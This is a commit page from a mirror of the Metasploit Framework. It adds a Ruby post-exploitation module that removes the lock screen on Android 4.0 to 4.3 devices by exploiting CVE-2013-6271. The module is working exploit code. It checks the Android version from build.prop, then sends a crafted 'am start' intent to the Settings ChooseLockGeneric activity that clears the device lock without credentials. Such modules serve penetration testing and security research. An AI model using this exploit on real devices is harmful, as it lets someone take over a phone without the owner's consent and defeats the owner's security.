infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

android 4.x remove locks (without root)

bug/bundler_fix
Tim 2015-05-26 06:47:44 +01:00
parent f953dc08d9
commit 45b2632d21
No known key found for this signature in database
GPG Key ID: 217FBA50ABBAABEF
1 changed files with 53 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
modules/post/android/manage/remove_lock.rb Normal file
View File

@ -0,0 +1,53 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Post
Rank = NormalRanking
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
'Name' => "Android Settings Remove Device Locks",
'Description' => %q{
This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.
Any unprivileged app can exploit this vulnerability to remove the lockscreen.
A logic flaw / design error exists in the settings application that allows an Intent from any
application to clear the screen lock. The user may see that the Settings application has crashed,
and the phone can then be unlocked by a swipe.
This vulnerability was patched in Android 4.4.
},
'License' => MSF_LICENSE,
'Author' => [
'CureSec', # discovery
'timwr' # metasploit module
],
'References' =>
[
[ 'CVE', '2013-6271' ],
[ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],
[ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]
],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Platform' => 'android',
'DisclosureDate' => "Oct 11 2013"
}
))
end
def run
buildprop = cmd_exec('cat /system/build.prop')
unless buildprop =~ /ro.build.version.release=4.[0|1|2|3]/
print_error("This module is only compatible with Android versions 4.0 to 4.3")
return
end
cmd_exec('am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task')
end
end